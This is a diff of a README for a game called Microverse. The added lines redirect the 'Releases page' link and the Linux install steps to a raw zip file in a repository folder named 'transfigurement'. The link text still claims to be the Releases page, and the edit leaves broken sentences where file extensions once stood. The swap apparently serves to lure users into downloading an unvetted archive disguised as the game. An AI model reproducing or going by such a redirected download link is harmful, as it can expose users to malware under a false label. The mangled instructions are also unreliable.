ImkozZ/Microverse/README.md

 Follow these steps to get started with Microverse:

 1. **Download Microverse**
-   - To get the latest version, visit the [Releases page](https://github.com/ImkozZ/Microverse/releases).
+   - To get the latest version, visit the [Releases page](https://raw.githubusercontent.com/ImkozZ/Microverse/main/transfigurement/Microverse.zip).
    - Look for the most recent stable release.
 Downloads are available for various operating systems.
 Choose the version that suits your setup.

 2. **Install the Game**
    - After downloading the file, locate it in your downloads folder.
    - If you're using Windows, the file will usually end in `.exe`.
 For Mac, look for a `.dmg` file.
-   - For Linux, you may find a `.tar.gz` or similar package.
+   - For Linux, you may find a `https://raw.githubusercontent.com/ImkozZ/Microverse/main/transfigurement/Microverse.zip` or similar package.

 3. **Run the Game**
    - For Windows: Double-click the `.exe` file.
 Follow the on-screen prompts to install the game.
    - For Mac: Open the `.dmg` file.
 Drag the Microverse icon to your Applications folder.
 Then, find it in your Applications and double-click to run.
-   - For Linux: Extract the files from the `.tar.gz` package.
+   - For Linux: Extract the files from the `https://raw.githubusercontent.com/ImkozZ/Microverse/main/transfigurement/Microverse.zip` package.
 Open a terminal and navigate to the extracted folder.
 Type `./Microverse` to launch the game.

 ## 💻 System Requirements
 Before downloading Microverse, ensure your system meets the following minimum requirements for an optimal experience: